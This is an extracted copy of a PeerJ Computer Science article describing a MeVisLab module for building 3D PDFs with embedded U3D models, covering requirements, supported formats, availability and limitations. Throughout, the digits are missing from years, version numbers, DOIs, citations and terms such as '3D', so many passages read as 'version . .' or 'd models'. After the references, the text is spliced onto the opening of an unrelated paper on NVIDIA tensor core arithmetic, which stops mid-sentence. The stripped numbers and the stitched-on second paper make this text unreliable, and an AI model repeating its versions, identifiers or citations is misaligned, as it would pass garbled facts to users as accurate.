objects, if only to simply ensure that all objects are visible. no freely available tool for pdf creation currently provides a feature to pre-define such a view. the movie package for latex (grahn, ) provides a mechanism do determine the view parameters, but that requires the generation of intermediate pdfs. finally it must be mentioned that many previously published d models are very large—sometimes up to nearly megabytes (krause et al., ). in most cases, this size could (and should) be reduced significantly, because the density of polygon meshes does usually not need to be very high for illustrative purposes. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://meshlab.sourceforge.net/ http://dx.doi.org/ . /peerj-cs. figure general layout of a scholarly figure if provided as supplemental material mevislab mevislab is a framework for image processing and an environment for visual development, published by mevis medical solutions ag and fraunhofer mevis in bremen, germany. it is available via download (http://www.mevislab.de/download/) for all major platforms (microsoft windows, mac os and linux) and has a licensing option which is free for use in non-commercial organizations and research (‘‘mevislab sdk unregistered’’ license, http://www.mevislab.de/mevislab/versions-and-licensing/). beside the development features, mevislab can be used as a framework for creating sophisticated applications with graphical user interfaces that hide the underlying platform and that can simply be used without any programming knowledge (koenig et al., ; heckel, schwier & peitgen, ; ritter et al., ). mevislab has been evaluated as a very good platform for creating application prototypes (bitter et al., ), is very newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/download/ http://www.mevislab.de/mevislab/versions-and-licensing/ http://dx.doi.org/ . /peerj-cs. well documented (http://www.mevislab.de/developer/documentation/) and supported by an active online community (http://www.mevislab.de/developer/community/; https://github.com/mevislab/communitymodules/tree/master/community). all algorithms and functions included into mevislab are represented and accessed by ‘‘modules,’’ which can be arranged and connected to image processing networks or data processing networks on a graphical user interface (gui) following the visual data-flow development paradigm. by means of so-called ‘‘macro modules,’’ these networks can then be converted with little effort into complete applications with an own gui. methods elicitation of requirements as described above, the generation of the necessary d model data and particularly of the final pdf is still subject to a number of difficulties. therefore, the first step was the creation of a list of requirement specifications with the aim to create a tool that overcomes these known drawbacks. two requirements have been identified to be the most important ones: ( ) the demand for a tool that creates ‘‘ready-to-publish’’ pdf documents without the need for commercial software and ( ) the integration of all necessary steps into a single and easy-to-use interface. beside these two main requirements, a number of additional requirements have then been identified as well. see table for a full list of all requirements that were the basis for the following development. creation of an “app” for mevislab mevislab-based solutions presented in previous work (newe & ganslandt, ; newe, ) already provide the possibility to create u d files without requiring programming skills and without the need for an intensive training. however, they still needed some basic training as regards assembling the necessary processing chains in mevislab. furthermore, the creation of the final pdf was not possible so far. therefore, a new macro module was created for mevislab. a macro module encapsulates complex processing networks and can provide an integrated user interface. in this way, the internal processes can be hidden away from the user, who can focus on a streamlined workflow instead. designed in an appropriate way, a macro module can also be considered as an ‘‘app’’ inside of mevislab. in order to provide the necessary functionality, some auxiliary tool modules (e.g., for the creation of the actual pdf file) needed to be developed as well. along with the modules for u d export mentioned above, these auxiliary tool modules were integrated into the internal processing network of the main ‘‘app’’ macro. the technical details of these internal modules are not within the scope of this article. however, the source code is available and interested readers are free to explore the code and to use it for own projects. the user interface of the app was designed in a way that it guides novice users step-by-step without treating experienced users too condescendingly, though. finally, a comprehensive documentation including an example project, a wizard for creating tailored pdf modules and a verbose help text was set up. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/developer/documentation/ http://www.mevislab.de/developer/community/ https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. table requirements for the development of the software tool. the two main requirements are high- lighted in bold font. id requirement specification r the software shall create ready-to-publish pdf documents with embedded d models. r . the software shall offer an option to specify the activation mode and the deactivation mode for the d models. r the software shall provide an integrated, single-window user interface that comprises all necessary steps. r the software shall be executable under windows, macos and at least one linux distribution. r the software shall be executable without the need to purchase a commerical license. r the software shall create d model files in u d format. r . the software shall create view definitions for the d model. r . the software shall create poster images for the pdf document. r the software shall import mesh geometry from files in obj, stl and ply format. r . the software should import mesh geometry from other file formats as well. r . the software shall offer an option to reduce the number of triangles of imported meshes. r . the software shall offer an option to specify the u d object name and the color of imported meshes. r the software shall import line set geometry from files in text format. r . the software shall offer an option to specify the u d object name and the color of imported line sets. r the software shall import point set geometry from files in text format. r . the software shall offer an option to specify the u d object name of imported point sets. deployment of core functionality for the creation of the actual pdf files, version . . of the cross-platform, open source library libharu (http://libharu.org/) was selected, slightly modified and integrated as third-party contribution into mevislab. next, the application programming interface (api) of libharu was wrapped into an abstract base module for mevislab in order to provide an easy access to all functions of the library and in order to hide away standard tasks like creating a document or releasing memory. a large number of convenience functions were added to this base module and an exemplary mevislab project was set up in order to demonstrate how to use the base module for tailored applications. this base module also served as basis for the pdf creation of the app macro described above. finally, a project wizard was integrated into the mevislab gui. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://libharu.org/ http://dx.doi.org/ . /peerj-cs. figure user interface of the app. the user interface comprises all necessary steps for the creation of d model files and pdf files. it is arranged in tabs for each step. results the “scientific dfigurepdfapp” module the new macro module ‘‘scientific dfigurepdfapp’’ for mevislab provides an integrated user interface for all steps that are necessary for the creation of u d model files and for the creation of the final pdf documents with embedded d models. the model editor part produces u d model files of geometry data that are compatible with version of the ecma- standard and poster images in portable network graphics (png) format. the pdf editor part produces pdf documents that are compliant with pdf version . (iso - : ). an example pdf is available as file s . the user interface is arranged in tabs, whereas each tab comprises all functions for one step of the workflow. by processing the tabs consecutively, the user can assemble and modify d models, save them in u d format, create views and poster images for the pdf document, and finally create the pdf itself step by step (fig. ). the raw model data can be collected in two ways: either by feeding it to the input connectors or by assembling it by means of the built-in assistant. the former option is intended for experienced mevislab users that want to attach the module at the end of a processing chain. the latter option addresses users that simply want to apply the app for converting existing d models and for creating an interactive figure for scholar publishing. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. table list of supported d formats for importing geometry data (textures, animations and other features are not supported). file format typical file extension(s) stereolithography *.stl stanford polygon library *.ply wavefront object *.obj object file format *.off blender *.blend raw triangles *.raw raw point clouds *.csv; *.txt raw line sets *.csv; *.txt d gamestudio *.mdl; *.hmp d studio max *. ds; *.ase ac d *.ac autocad/autodesk *.dxf biovision bvh *.bvh characterstudio motion *.csm collada *.dae; *.xml directx x *.x doom *.md mesh; *.md anim; *.md camera irrlicht *.irrmesh; *.irr; *.xml lightwave *.lwo; *.lws milkshape d *.ms d modo model *.lxo neutral file format *.nff ogre *.mesh.xml; *.skeleton.xml; *.material quake i, quake ii, quake iii *.mdl; *.md ; *.md ; *.pk quick d *.q o; *q s rtcw *.mdc sense worldtoolkit *.nff terragen terrain *.ter truespace *.cob; *.scn valve model *.smd; *.vta xgl *.xgl; *.zgl the software allows for importing the geometry data of different d formats, including point clouds and line sets from files in character-separated value (csv) format (see table for a full list). the import of textures and animations is not supported. objects from different sources can be combined and their u d properties (colour, name, position in the object tree) can be specified. the density of imported meshes can be adjusted interactively and multiple views (i.e., the specification of camera, lighting and render mode) can be pre-defined interactively as well. finally, it is also possible to create a poster image which can replace an inactive d model in the pdf document if the model itself is disabled or if it cannot be displayed for some reason (e.g., because the reading software does not provide the necessary features). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table list of features. category features data import import external data, import mevislab data, import point clouds, import line sets, import meshes from file formats, adjust mesh density, preview import point cloud editing specify point cloud name, specify position in model tree, preview settings line set editing specify line set name, specify position in model tree, specify colour, preview settings mesh editing specify mesh name, specify position in model tree, specify colour, specify opacity, preview settings view specification specify view name, specify background colour, specify lighting scheme, specify render mode, preview settings, specify multiple views u d creation store model in u d format, preview scene poster image creation store poster in png format, preview scene, specify superimposed text pdf creation store document in pdf (v . ) format, specify header citation text, specify header headline text, specify u d file, specify poster file, specify model activation mode, specify model deactivation mode, specify toolbar enabling, specify navigation bar enabling, specify animation start mode, specify caption, specify description text all functions are explained in detail in a comprehensive documentation which can be accessed directly inside mevislab. a stand-alone copy of the documentation is available as file s . in order to use the app, it simply needs to be instantiated (via the mevislab menu: modules → pdf → apps → scientific dfigurepdfapp). a full feature list is available in table . additional features for tailored pdf creation the abstract module which wraps the api of the pdf library libharu into a mevislab module was made public (‘‘pdfgenerator’’ module) and can be used for the development of tailored mevislab modules. in order to facilitate the re-use of this abstract base module, an exemplary project was set up (/projects/pdfexamples/savepdftemplate). this project demonstrates how to derive a customized module from the pdfgenerator base module and how to specify the content of the pdf file that will be created by means of the new module. the template code is verbosely annotated and includes examples for setting pdf properties (e.g., meta data, page size, encryption) as well as the document content (including text, images, graphics and d models). the output of the savepdftemplate module is illustrated in fig. . finally, a project wizard was integrated into the mevislab gui. it can be accessed via the mevislab menu: file → run project wizard...→ pdf module. the wizard consists of three steps (fig. ) whereof the second step offers the possibility to include demo code which produces the same pdf file as the savepdftemplate module described above. the general usage of project wizards in mevislab is explained in chapter of the mevislab newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. figure output of the savepdftemplate module. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure project wizard for creating customized pdf modules. manual (menu: help → browse help pages → using mevislab → mevislab reference manual). availability the whole pdf project for mevislab (which includes the scientific dfigurepdfapp, the pdfgenerator base module, the savepdftemplate project, the project wizard and all source code files) is available for microsoft windows, macos and linux (tested with ubuntu . . ). it requires mevislab . or a later version (http://www.mevislab.de/download/). the windows version of mevislab is available for four compiler versions. this is relevant only if the source code is intended to be compiled manually (see below). there are two approaches to add the app and the other elements to an existing mevislab installation: add-on installers and the online repository of the mevislab community sources. installers are self-contained, executable archives that automatically add all necessary files to an existing mevislab installation. the target groups for these installers are mevislab newcomers and pure users that want to use the scientific dfigurepdfapp out-of-the-box. the current version of the installers for all operating systems and all -bit compiler versions can be downloaded from the research data repository zenodo ( . /zenodo. ). installers for the previous version of mevislab ( . . ) are available as well ( . /zenodo. ), but this version will not be supported in the future. updates will be made available via zenodo as well. a dedicated zenodo community collection named ‘‘three-dimensional portable document format ( d pdf) in science’’ has been set up for this purpose (https://zenodo.org/collection/user- d-pdf). all those who are interested in being able to always use the latest version should connect their mevislab installation with the community sources which are hosted at github (https://github.com/mevislab/communitymodules/tree/master/community). this approach, however, requires compiling the source code and is intended only for experienced users or for users that are willing to become acquainted with mevislab. note newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.mevislab.de/download/ http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. https://zenodo.org/collection/user- d-pdf https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. that there are multiple versions available for windows, depending on the compiler that is intended to be used. discussion a toolbox for the creation of d pdfs the utilization of d pdf technology for scholarly publishing has been revealed and proven both useful and necessary by several authors in the past years. the mainstream application of d pdf in science, however, is yet to come. one reason might be the difficult process that has so far been necessary to create appropriate data and relevant electronic documents. this article presents an all-in-one solution for the creation of such files which requires no extraordinary skills. it can be used by low-end users as an out-of-the-box tool as well as a basis for sophisticated tailored solutions for high-end users. many typical problems as regards the creation of d model files have been addressed and solved. all steps of the workflow are integrated seamlessly. the software is available for all os platforms and can import and process objects from many popular d formats, including polylines and point clouds (table ). the density of imported meshes can be adjusted interactively which enables the user to find the best balance between the desired level of detail and the file size. the main contribution, however, is the possibility to create ready-to-publish pdf documents with a minimum of steps. this approach was proposed to be the ideal solution by kumar et al. ( ). to best knowledge, this is the first time that such an integrated and comprehensive solution is made available for the scientific community. applications the areas of application (see an example in file s ) are manifold and not limited to a specific scientific discipline. on the contrary: every field of research that produces three-dimensional data can and should harness this technology in order to get the best out of that data. one (arbitrary) example for the possible use of mesh models from the recent literature is d ultrasound. dahdouh et al. ( ) recently published about the results of segmentation of obstetric d ultrasound images. that article contains several figures that project three- dimensional models on the available two-dimensional surface. a presentation in native d would have enabled the reader to interactively explore the whole models instead of just one pre-defined snapshot. another example is the visualization of molecular structures as demonstrated by kumar et al. ( ). polylines can be used to illustrate nervous fibre tracking. mitter et al., ( ) used d projections of association fibres in the foetal brain to visualize their results. a real d visualization would have been very helpful in this case as well: while some basic knowledge about a depicted object helps to understand d projections of d structures, the possibility to preserve at least a little depth perception decreases with an increasing level of abstraction (mesh objects vs. polylines). newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supp- http://dx.doi.org/ . /peerj-cs. this particularly applies to point clouds which can be observed, for example, in an article by qin et al. ( ): although these authors added three-dimensional axes to their figure (no. ) it is still hard to get an impression of depth and therefore of the real position of the points in d space. limitations although the presented software pulls down the major thresholds that impede the creation of interactive figures for scholarly publishing, some limitations still need to be considered. a general concern is the suitability of pdf as a means to visualize and to exchange d models. pdf and u d (or prc) do not support all features that other modern d formats provide and that would be of interest for the scientific community (e.g., volumetric models). on the other hand, pdf is commonly accepted and de-facto the only file format that is used for the electronic exchange of scholarly articles. therefore, pdf may not be the perfect solution, but it is the best solution that is currently available. the presented software requires mevislab as background framework and the installation of mevislab requires a medium-sized download of about gb (depending on the operating system), which could be considered rather large for a pdf creator. on the other hand, mevislab integrates a large library for the processing and the visualization of (biomedical) image data. furthermore, other frameworks (like meshlab) do not provide all necessary features (e.g., polylines or point clouds) and therefore were not considered to meet basic requirements for the development of the software tool. the import of d models is based on the open asset import library (http: //www.assimp.org/) which does not support all features of all d formats. for example, textures and animations cannot be imported and should thus not be embedded into a model file that is intended to be imported. however, although the model-editor part of the presented software does not support textures (or animations), the pdf-creator part can still be used to produce scientific pdfs with textured or animated models, if the necessary u d files have been created with external and more specialized software. in this use case, the scientific dfigurepdfapp does not integrate all necessary steps, but it still remains a ‘‘few-clicks’’ alternative for the creation of interactive pdf supplements for scientific publications and it still obviates the need for a commercial solution. finally, very large model files should be avoided. if a large model fails to import, it should be separated into several sub-models. a mesh reduction can be applied after the import, but a previously reduced mesh speeds up the import process. suitable reading software the adobe reader (http://get.adobe.com/reader/otherversions/) is available free of charge for all major operating systems (ms windows, mac os, linux). it is currently the only software that can be used to display embedded d models and to let the user interact with them (zooming, panning, rotating, selection of components). however, even the adobe reader does not support all u d features (adobe, ), e.g., glyphs and view nodes. furthermore, a rendering flaw has been observed on low-end graphic boards in macos hardware (fig. ). adobe reader for macos does not render transparent surfaces newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.assimp.org/ http://www.assimp.org/ http://get.adobe.com/reader/otherversions/ http://dx.doi.org/ . /peerj-cs. figure rendering artifacts. these tessellation artifacts have been observed on macos systems with low-end graphic hardware. superimposed upon each other correctly: instead, a strong tessellation effect is visible. this may also occur on other platforms but has not been reported yet. since this is an issue with the rendering engine of adobe reader, there is currently no other solution than using a different render mode (e.g., one of the wireframe modes) or different hardware. experience shows that many users do not expect a pdf document to be interactive. therefore, possible consumers should be notified that it is possible to interact with the document and they should also be notified that the original adobe reader is required for this. although poster images are a workaround to avoid free areas in pdf readers that are not capable of rendering d scenes, missing d features of a certain reader could be confusing for a user. a basis for own modules as pointed out in previous work (newe, ), the authoring of a pdf document is usually a complex task and thus in most cases it cannot be avoided to separate the generation of d model data from the actual pdf authoring. although the software tool presented in this article mitigates this general problem by integrating model generation and pdf creation, it is still limited to a certain use case and a pre-defined pdf layout. however, the api of the core pdf functionality is public and designed in a way that facilitates the creation of own pdf export modules. the large number of convenience functions for the abstract base module (pdfgenerator) facilitates the creation of derived modules. these functions massively lighten the programmer’s workload by providing a simple access to routine tasks like writing text at a defined position or like embedding a d model which would normally require a whole series of api calls. finally, the built-in newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. wizard generates all necessary project files and source code files to create a fully functional module barebone which only needs to be outfitted with the desired functionality. outlook although this article represents an important milestone, the development of the pdf project for mevislab is ongoing. future goals are the integration of virtual volume rendering (barnes et al., ), animations (van de kamp et al., ) and the parsing of u d files that have been created with external software. the progress can be tracked via github (https://github.com/mevislab/communitymodules/tree/master/community) and updates to the binary files will be published regularly. conclusion three-dimensional data is produced at an increasing rate throughout all scientific disciplines. the portable document format is a well-suited medium for the visualization and the publication of this kind of data. with the software presented in this article, the complete workflow for generating d model files and d pdf documents for scholarly publications can be processed in a consolidated working environment, free of license costs and with all major operating systems. the software addresses novices as well as experienced users: on the one hand, it provides an out-of-the-box solution that can be used like a stand-alone application, and on the other hand, all sources and apis are freely available for specifically tailored extensions. list of abbreviations d two-dimensional d three-dimensional pdf portable document format iso international organization for standardization u d universal d prc product representation compact cad computer aided construction ecma european computer manufacturers association gui graphical user interface api application programming interface png portable network graphics csv character-separated value, comma-separated value acknowledgements thanks to dr. hans meine, fraunhofer mevis, bremen, germany, for compiling the code for macos and linux and for building installers. thanks to dr. thomas van de kamp, karlsruhe institute of technology, karlsruhe, germany, for providing test data. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/mevislab/communitymodules/tree/master/community http://dx.doi.org/ . /peerj-cs. additional information and declarations funding the author received no funding for this work. competing interests the author declares there is no competing interests. author contributions • axel newe conceived and designed the experiments, contributed reagents/materials/anal- ysis tools, wrote the paper, prepared figures and/or tables, performed the computation work, reviewed drafts of the paper, implemented the software. data availability the following information was supplied regarding data availability: https://github.com/mevislab/communitymodules/tree/master/community/general; . /zenodo. ; . /zenodo. . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references adobe systems incorporated (adobe) . pdf reference, fifth edition, adobe portable document format, version . . available at http://wwwimages.adobe.com/content/ dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf (accessed may ). archived at http://www.webcitation.org/ gunindkd. adobe systems incorporated (adobe) . adobe announces acrobat . software availability. available at https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html (accessed may ). archived at http://www. webcitation.org/ gunqpxoe. adobe systems incorporated (adobe) . u d supported elements. available at http: //www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf (accessed may ). archived at http://www.webcitation.org/ eu dnbj. adobe systems incorporated (adobe) a. document management—portable document format—part : pdf . . available at http://wwwimages.adobe.com/ content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf (accessed may ). archived at http://www.webcitation.org/ s xkrvpw. adobe systems incorporated (adobe) b. adobe r© supplement to the iso , baseversion: . , extensionlevel: . available at http://wwwimages.adobe.com/ content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf (accessed may ). archived at http://www.webcitation.org/ gunw iyd. newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/mevislab/communitymodules/tree/master/community/general http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf_reference_archives/pdfreference .pdf http://www.webcitation.org/ gunindkd https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html https://www.adobe.com/aboutadobe/pressroom/pressreleases/ / acrobat.html http://www.webcitation.org/ gunqpxoe http://www.webcitation.org/ gunqpxoe http://www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf http://www.adobe.com/content/dam/adobe/en/devnet/acrobat/pdfs/u delements.pdf http://www.webcitation.org/ eu dnbj http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/pdf _ .pdf http://www.webcitation.org/ s xkrvpw http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf http://wwwimages.adobe.com/content/dam/adobe/en/devnet/pdf/pdfs/adobe_supplement_iso .pdf http://www.webcitation.org/ gunw iyd http://dx.doi.org/ . /peerj-cs. adobe systems incorporated (adobe) . adobe—pdf: the global standard for trusted, electronic documents and forms. available at http://www.adobe.com/au/ pdf/about/history/ (accessed may ). archived at http://www.webcitation.org/ etx arad. adobe systems incorporated (adobe) . pdf reference and adobe extensions to the pdf specification. available at http://www.adobe.com/devnet/pdf/pdf_reference.edu. html (accessed may ). archived at http://www.webcitation.org/ s y shjg. barnes dg, fluke cj. . incorporating interactive -dimensional graphics in astronomy research papers. new astronomy ( ): – doi . /j.newast. . . . barnes dg, vidiassov m, ruthensteiner b, fluke cj, quayle mr, mchenry cr. . embedding and publishing interactive, -dimensional, scientificfigures in portable document format (pdf) files. plos one ( ):e doi . /journal.pone. . bitter i, van uitert r, wolf i, ibanez l, kuhnigk jm. . comparison of four freely available frameworks for image processing and visualization that use itk. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . dahdouh s, angelini ed, grangé g, bloch i. . segmentation of embryonic and fetal d ultrasound images based on pixel intensity distributions and shape priors. medical image analysis ( ): – doi . /j.media. . . . danz jc, katsaros c. . three-dimensional portable document format: a sim- ple way to present -dimensional data in an electronic publication. amer- ican journal of orthodontics and dentofacial orthopedics ( ): – doi . /j.ajodo. . . . ecma international (ecma). . standard ecma- , universal d file format, th edition (june ). available at available at http://www.ecma-international.org/cgi- bin/counters/unicounter.pl?na%me=ecma- _ thedition&deliver=http://www. ecma-international.org/publications/files/ecma-st/ecma- % th% edition. pdf (accessed may ). archived at: available at http://www.webcitation.org/ qki nqn. elsevier. . interactive u d models. available at http://www.elsevier.com/about/ content-innovation/u d-models (accessed may ). archived at http://www. webcitation.org/ etxa hgv . grahn a. . the movie package. available at http://solar.physics.montana.edu/ kankel/ph /resources/latex/graphics-animations/movie .pdf (accessed may ). archived at http://www.webcitation.org/ etzfqj v. heckel f, schwier m, peitgen ho. . object oriented application development with mevislab and python. in: lecture notes in informatics (informatik : im focus das leben). bonn: gesellschaft fuer informatik, – . hugh-jones p. . diabetes in jamaica. the lancet ( ): – doi . /s - ( ) - . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.adobe.com/au/pdf/about/history/ http://www.adobe.com/au/pdf/about/history/ http://www.webcitation.org/ etx arad http://www.webcitation.org/ etx arad http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.adobe.com/devnet/pdf/pdf_ reference.edu.html http://www.webcitation.org/ s y shjg http://dx.doi.org/ . /j.newast. . . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /j.media. . . http://dx.doi.org/ . /j.ajodo. . . http://dx.doi.org/ . /j.ajodo. . . http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.ecma-international.org/cgi-bin/counters/unicounter.pl?na% me=ecma- _ thedition&deliver=http://www.ecma-international.org/publications/files/ecma-st/ecma- % th% edition.pdf http://www.webcitation.org/ qki nqn http://www.webcitation.org/ qki nqn http://www.elsevier.com/about/content-innovation/u d-models http://www.elsevier.com/about/content-innovation/u d-models http://www.webcitation.org/ etxa hgv http://www.webcitation.org/ etxa hgv http://solar.physics.montana.edu/kankel/ph /resources/latex/graphics-animations/movie .pdf http://solar.physics.montana.edu/kankel/ph /resources/latex/graphics-animations/movie .pdf http://www.webcitation.org/ etzfqj v http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. hurd jm. . the transformation of scientific communication: a model for . jour- nal of the american society for information science and technology ( ): – doi . / - ( ) : . .co; - . international organization for standardization (iso). . iso - : document management—portable document format—part : pdf . . available at http://www.iso.org/iso/iso_catalogue/catalogue_tc/catalogue_detail.htm?csnumbe= (accessed may ). archived at http://www.webcitation.org/ qkfzgvk . international organization for standardization (iso). . iso/dis - review guide. available at http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _review_only.pdf (accessed may ). archived at http://www. webcitation.org/ byqjvkas. koenig m, spindler w, rexilius j, jomier j, link f, peitgen ho. . embedding vtk and itk into a visual programming and rapid prototyping platform. in: proceedings of spie, medical imaging : visualization, image-guided procedures, and display. bellingham: spie. krause dw, wible jr, hoffmann s, groenke jr, o’connor pm, holloway wl, rossie jb. . craniofacial morphology of vintana sertichi (mammalia, gondwanathe- ria) from the late cretaceous of madagascar. journal of vertebrate paleontology (supplement ): – doi . / . . . kumar p, ziegler a, grahn a, hee cs, ziegler a. . leaving the structural ivory tower, assisted by interactive d pdf. trends in biochemical sciences ( ): – doi . /j.tibs. . . . kumar p, ziegler a, ziegler j, uchanska-ziegler b, ziegler a. . grasping molecular structures through publication-integrated d models. trends in biochemical sciences ( ): – doi . /j.tibs. . . . lautenschlager s. . palaeontology in the third dimension: a comprehensive guide for the integration of three-dimensional content in publications. paläontologische zeitschrift ( ): – doi . /s - - - . maunsell j. . announcement regarding supplemental material. journal of neuro- science ( ): – . mitter c, prayer d, brugger pc, weber m, kasprian g. . in vivo tractography of fetal association. plos one ( ):e doi . /journal.pone. . newe a. . towards an easier creation of three-dimensional data for embedding into scholarly d pdf (portable document format) files. peerj :e doi . /peerj. . newe a, becker l, schenk a. . application and evaluation of interactive d pdf for presenting and sharing planning results for liver surgery in clinical routine. plos one ( ):e doi . /journal.pone. . newe a, ganslandt t. . simplified generation of biomedical d surface model data forembedding into d portable document format (pdf) files for publication and education. plos one ( ):e doi . /journal.pone. . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . / - ( ) : . .co; - http://dx.doi.org/ . / - ( ) : . .co; - http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.iso.org/iso/iso_ catalogue/catalogue_tc/catalogue_detail.htm?csnumber= http://www.webcitation.org/ qkfzgvk http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _ review_ only.pdf http://www.pdfa.org/wp-content/uploads/ / /iso- - _dis- _ review_ only.pdf http://www.webcitation.org/ byqjvkas http://www.webcitation.org/ byqjvkas http://dx.doi.org/ . / . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /j.tibs. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. phelps a, naeger dm, marcovici p. . embedding d radiology models in portable document format. american journal of roentgenology ( ): – doi . /ajr. . . qin y, yao w, vu tt, li s, niu z, ban y. . characterizing radiometric attributes of point cloud using anormalized reflective factor derived from small footprint lidar waveform. ieee journal of selected topics in applied earth observations and remote sensing ( ): – doi . /jstars. . . ritter f, boskamp t, homeyer a, laue h, schwier m, link f, peitgen ho. . medical image analysis. ieee pulse ( ): – doi . /mpul. . . ruthensteiner b, heß m. . embedding d models of biological specimens in pdf publications. microscopy research and technique ( ): – doi . /jemt. . thoma gr, ford g, antani s, demner-fushman d, chung m, simpson m. . interactive publication: the document as a research tool. web semantics ( – ): – doi . /j.websem. . . . tory m, möller t. . human factors in visualization research. ieee transactions on visualization and computer graphics ( ): – doi . /tvcg. . . van de kamp t, dos santos rolo t, vagovic p, baumbach t, riedel a. . three- dimensional reconstructions come to life—interactive d pdf animations in func- tional morphology. plos one ( ):e doi . /journal.pone. . zlatanova s, verbree e. . the third dimension in lbs: the steps to go. in: pro- ceedings of the rd symposium on location based services & telecartography, – november , vienna, austria, – . newe ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /ajr. . http://dx.doi.org/ . /ajr. . http://dx.doi.org/ . /jstars. . http://dx.doi.org/ . /mpul. . http://dx.doi.org/ . /jemt. http://dx.doi.org/ . /jemt. http://dx.doi.org/ . /j.websem. . . http://dx.doi.org/ . /tvcg. . http://dx.doi.org/ . /journal.pone. http://dx.doi.org/ . /peerj-cs. numerical behavior of nvidia tensor cores numerical behavior of nvidia tensor cores massimiliano fasi , nicholas j. higham , mantas mikaitis and srikara pranesh school of science and technology, Örebro university, Örebro, sweden department of mathematics, university of manchester, manchester, uk abstract we explore the floating-point arithmetic implemented in the nvidia tensor cores, which are hardware accelerators for mixed-precision matrix multiplication available on the volta, turing, and ampere microarchitectures. using volta v , turing t , and ampere a graphics cards, we determine what precision is used for the intermediate results, whether subnormal numbers are supported, what rounding mode is used, in which order the operations underlying the matrix multiplication are performed, and whether partial sums are normalized. these aspects are not documented by nvidia, and we gain insight by running carefully designed numerical experiments on these hardware units. knowing the answers to these questions is important if one wishes to: ( ) accurately simulate nvidia tensor cores on conventional hardware; ( ) understand the differences between results produced by code that utilizes tensor cores and code that uses only ieee -compliant arithmetic operations; and ( ) build custom hardware whose behavior matches that of nvidia tensor cores. as part of this work we provide a test suite that can be easily adapted to test newer versions of the nvidia tensor cores as well as similar accelerators from other vendors, as they become available. moreover, we identify a non-monotonicity issue affecting floating point multi-operand adders if the intermediate results are not normalized after each step. subjects algorithms and analysis of algorithms, computer architecture, scientific computing and simulation keywords nvidia v gpu, nvidia t gpu, tensor core, dot product, matrix multiply-accumulate, floating-point arithmetic, half precision, binary , ieee arithmetic, nvidia a gpu introduction one hundred and sixteen of the computers in the november top list (https://www.top .org/lists/top / / /) are equipped with nvidia graphics processing units (gpus) based on the volta, turing, and ampere microarchitectures. a prominent feature of these gpus is the tensor cores, which are specialized hardware accelerators for performing a matrix 